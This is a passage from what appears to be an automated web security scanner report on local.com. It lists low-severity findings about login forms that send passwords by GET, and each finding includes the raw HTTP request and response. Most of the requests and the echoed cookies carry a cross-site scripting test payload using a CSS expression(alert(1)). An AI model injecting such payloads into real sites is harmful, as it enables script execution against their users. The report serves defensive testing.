<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.16. http://www.local.com/coupons/printable/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/printable/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /coupons/printable/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.17. http://www.local.com/events/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /events/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86267
Date: Thu, 03 Feb 2011 16:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:58 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.18. http://www.local.com/events/category/music/dallas-tx.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /events/category/music/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92872
Date: Thu, 03 Feb 2011 16:44:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.19. http://www.local.com/events/category/performing-arts/dallas-tx.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /events/category/performing-arts/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87986
Date: Thu, 03 Feb 2011 16:44:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.20. http://www.local.com/events/category/sports/dallas-tx.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /events/category/sports/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 90349
Date: Thu, 03 Feb 2011 16:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:32 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 90349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.21. http://www.local.com/faq.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /faq.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /faq.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28952
Date: Thu, 03 Feb 2011 16:53:12 GMT
Content-Length: 28952
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Frequently Asked Qu
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.22. http://www.local.com/privacy/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /privacy/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /privacy/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 50592
Date: Thu, 03 Feb 2011 16:51:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 50592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Privacy Policy</tit
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.23. http://www.local.com/results.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 74200
Date: Thu, 03 Feb 2011 15:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=wu21mu55lor2xjbsdwrsmh45; path=/; HttpOnly
Set-Cookie: localcom=cid=710&loc=Dallas%2c+TX&kw=none&uid=1c5b338d-bcdd-44ba-b370-36f6691769b8&expdate=634349085027409460&bc=Results+for+none+in+Dallas%2c+TX|serp|%2fresults.aspx&rs=none|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:02 GMT; path=/
Content-Length: 74200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX none | Find none i
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.24. http://www.local.com/results/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /results/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
